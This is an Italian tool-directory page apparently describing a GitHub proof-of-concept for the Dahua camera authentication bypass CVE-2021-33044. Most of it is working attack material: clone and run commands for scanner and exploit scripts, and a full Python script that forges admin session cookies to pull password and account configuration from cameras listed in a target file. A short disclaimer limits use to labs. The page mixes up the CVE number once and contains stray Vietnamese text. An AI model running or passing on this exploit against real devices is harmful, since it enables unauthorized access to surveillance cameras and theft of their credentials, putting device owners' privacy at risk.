Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
DAHUA_AUTH-BYPASS-CVE-2021-33044 — Camera Dahua Research vulnerabilità CVE-2021-33044 | Kitploit
Strumenti/GitHubGitHub/eagle-nett/dahua_auth-bypass-cve-2021-33044
Autenticazione e AutorizzazioneSicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubeagle-nett/dahua_auth-bypass-cve-2021-33044

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

DAHUA_AUTH-BYPASS-CVE-2021-33044

Camera Dahua Research vulnerabilità CVE-2021-33044

Vedi Repository
14 mesi faNon ancora revisionato

Simulazione dell'exploit Dahua Authentication Bypass PoC (CVE-2021-33044)

Panoramica

Le telecamere IP Dahua sono dispositivi IoT ampiamente utilizzati nei sistemi di videosorveglianza. Poiché vengono spesso implementate in reti locali o accessibili da Internet, le vulnerabilità di sicurezza nelle telecamere IP possono avere un grave impatto sulla privacy e sulla sicurezza delle informazioni.

CVE-2021-33045 è una vulnerabilità di sicurezza presente in alcuni modelli di telecamere Dahua che consente l'accesso non autorizzato alle risorse di configurazione interne senza un'autenticazione valida. Questa vulnerabilità deriva da un meccanismo di controllo degli accessi non rigoroso nel firmware del dispositivo.

Informazioni sulla vulnerabilità

VoceContenuto
CVECVE-2021-33044
TipoAuthentication Bypass
GravitàCritical (CVSS ~9.8)
AuthNessuna autenticazione richiesta
ImpattoTelecamere Dahua / DVR / NVR

Causa

La vulnerabilità deriva da una progettazione non sicura dell'autenticazione nel firmware delle telecamere Dahua:

  • Il server non verifica correttamente sessione/token
  • Si fida dei dati inviati dal client
  • Alcuni endpoint di configurazione sensibili controllano solo la presenza del cookie, senza verificare i reali permessi di accesso

Ciò consente all'attaccante di:

  • falsificare il processo di autenticazione
  • aggirare completamente il login

Riferimenti:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Come funziona il meccanismo di bypass dell'autenticazione

Flusso normale

root@kitploit:~
→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

Scenari

Utilizzo

Installazione

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Scansione di rete

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

Porte Dahua comuni: 80,443, 8080, 37777, 37778

Sfruttamento della vulnerabilità CVE

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Bypass dell'autenticazione

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

Esempio

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Spiegazione

  • Lo script utilizza la libreria requests e disabilita attivamente gli avvisi SSL.

  • La funzione dump_accounts(ip, port=80) è la funzione principale responsabile del controllo di un dispositivo camera. Le funzionalità principali della funzione servono a:

    • Costruire l'URL dall'indirizzo IP e dalla porta
    • Simulare lo stato di accesso amministrativo tramite cookie
    • Inviare richieste agli endpoint di configurazione sensibili
    • Analizzare la risposta per determinare se il dispositivo è vulnerabile
  • Simula il cookie di autenticazione. La funzione utilizza valori di cookie come:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • Nelle versioni di telecamera vulnerabili, il backend non verifica il sessionID effettivo, portando il sistema a ritenere che la richiesta provenga da un account amministrativo valido.

Ciclo di elaborazione dell'elenco dei target

Lo script legge l'elenco dei target da un file di input e chiama la funzione di controllo per ciascun dispositivo. Questo approccio consente di valutare più telecamere automaticamente.

immagine

Processo di sviluppo

Questi script sono stati sviluppati sulla base di:

  • Dettagli CVE pubblicati da NVD
  • Advisory di sicurezza Dahua
  • Riferimenti PoC pubblici (seclists.org, packetstormsecurity)

Stato dei test:

  • La logica di bypass dell'autenticazione è implementata secondo le specifiche CVE
  • Test limitati su dispositivi vulnerabili.

Nota

Questo progetto:

  • Da utilizzare solo per scopi didattici e di ricerca
  • Da eseguire in un ambiente di laboratorio personale
Scarica lo strumento
FileScopoCVEs
dahua_scanner.pyScansione di rete — trova telecamere Dahua nella sottoreteRilevamento
dahua_exploit.pyStrumento di scansione Multi-CVE — verifica tutte le vulnerabilità di sicurezza.Tutte
dahua_auth_bypass.pyBypass dell'autenticazione dedicato con opzione --dumpCVE-2021-33044